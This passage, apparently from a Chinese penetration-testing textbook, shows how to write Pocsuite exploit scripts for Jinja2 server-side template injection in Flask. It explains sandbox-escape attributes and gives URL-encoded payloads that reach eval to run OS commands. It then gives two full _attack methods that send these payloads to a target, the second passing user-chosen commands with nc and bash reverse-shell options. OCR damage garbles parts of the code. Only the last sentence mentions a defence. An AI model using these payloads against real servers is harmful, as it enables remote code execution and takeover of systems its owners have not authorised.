EXP脚本编写

 

 

EXP脚本的编写与POC脚本编写一样，只需要修改_attack部分，替换成漏洞  利用的脚本即可。要利用Flask漏洞，需要用到Python的特性。关于如何在Jinja2模 板中执行Python代码，官方给出的方法是在模板环境中注册函数就可以进行调

用。

Jinja2模板访问Python的内置变量并调用时，需要用到Python沙盒逃逸方法， 具体参数如下所示。

·__bases__ ：以元组返回一个类所直接继承的类。

·__mro__ ：以元组返回继承关系链。

·__class__ ：返回对象所属的类。

·__globals__ ：以dict返回函数所在模块命名空间中的所有变量。

·__subclasses__（） ：以列表返回类的子类。

·_builtins_ ：内建函数。

Python中可以直接运行一些函数，如int（） 、list（） 等，这些函数可以在  __builtins__ 中查到。查看的方法是dir（__builtins__ ）。利用Python的特性，渗透 测试的思路是利用_builtins_ 的特性得到eval ，如下所示：

 

for c in () .__class   .   base__[0] .__subclass__() : if c .__name__== '_IterationGuard ' : c .__init   .   globals__[ '__builtins__ '][ 'eval ']("__import__( 'os ') .system ( 'whoami ')")

再将其转为Jinja2语法格式。Jinja2的语法与Python语法相似，但在每个语句 的开始和结束处需要使用{{%%}}括起来，转化后的代码如下所示：

{%%20for%20c%20in%20[] .__class   .   base   .   subclass__()%20%}%20{% ' \ '%20if%20c .__name__==%27_IterationGuard%27%20%}%20{{%20c .__init   .   globals__[%27__ builtins__%27] ' \ '[%27eval%27]("__import__(%27os%27) .popen(%27whoami%27 .read()")%20%%}%20{%%20end- if%20%}%20{% ' \ '%20endfor%20%}

最后将此EXP写到_attack方法中，便完成了EXP的编写，如下所示：

 

 

 

 

 

 

def __attack(self) :

' ' 'attack mode ' ' '

result = {}

path = "/?name="

url = self.url + path

payload = '{%%20for%20c%20in%20[] .__class   .   base   .   subclass__()%20 %}%20{% ' \

'%20if%20c .__name__==%27_IterationGuard%27%20%}%20{{%20c .__init   .   globals__[%27__ builtins__%27] ' \

'[%27eval%27]("__import__(%27os%27) .popen(%27whoami%27 .read()")%20%%}%20{%%20end-

if%20%}%20{% ' \

'%20endfor%20%} '

try:

resq = requests .get(url + payload)

if resq and resq .status_code == 200 and "www" in resq .text :

result[ 'VerifyInfo '] = {}

result[ 'VerifyInfo '][ 'URL '] = url

result[ 'VerifyInfo '][ 'Name '] = payload

except Exception,e:

pass

return self.parse_output(result)

如此便完成了Pocsuite的POC和EXP编写，程序运行结果如图3-4所示。

图3-4    Pocsuite利用脚本

利用Pocsuite 3开源框架，可以接收用户输入的命令行参数，对目标系统进行 半交互控制，具体实现过程如下所示。

首先，根据官方文档说明，编写一个接收自定义命令的函数，将接收到的命 令赋值给command参数。

 

 

 

 

 

def _options(self) : o = OrderedDic t() payload = { "nc" : REVERSE_PAYLOAD .NC, "bash" : REVERSE_PAYLOAD .BASH, } o["command"] = OptDic t(selected="bash", default=payload) return o

接下来，创造一个cmd变量，用于接收用户输入的command命令参数，并嵌  入payload字符串中。将写好的payload与url地址拼接，并通过request函数发送到目 标系统，这样就能够在目标系统中执行命令了。最后，将命令执行结果输出。代 码如下所示：

def _attack(self) : result = {} path = "?name=" url = self.url + path #print(url) cmd = self.get_option("command") payload = '%7B%25%20for%20c%20in%20%5B%5D .__class   .   base   .    subclasses__() '\ '%20%25%7D%0A%7B%25%20if%20c .__name__%20%3D%3D%20%27catch_warnings% 27%20%25%7D%0A%20%20%7B%25%20 '\ 'for%20b%20in%20c .__init   .   globals__ .values()%20%25%7D%0A%20%20%7B %25%20if%20b.__class__ '\ '%20%3D%3D%20%7B%7D .__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20 %27eval%27%20in%20b.keys() '\ '%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__ ("os") .popen(" '+cmd+ '") .read()%27) '\ '%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif %20%25%7D%0A%20%20%7B%25%20endfor '\ '%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D ' try: resq = requests .get(url + payload) t = resq .text t = t.replace( '\n ', ' ') .replace( '\r ', ' ') print(t) t = t.replace(" ","") result[ 'VerifyInfo '] = {} result[ 'VerifyInfo '][ 'URL '] = url result[ 'VerifyInfo '][ 'Name '] = t except Exception as e: return

执行命令pocsuite-r 1.py-uhttp://x.x.x.x:8000/--attack--command'id' ，最终效果如 图3-5所示。

 

 

 

 

 

图3-5    执行EXP攻击

Flask漏洞主要利用了框架的特点，在Flask中，“ {{}}” 中的内容会被当作代码 执行，相应的防御中就需要对“ {{}}”进行过滤，禁止此符号传入参数中。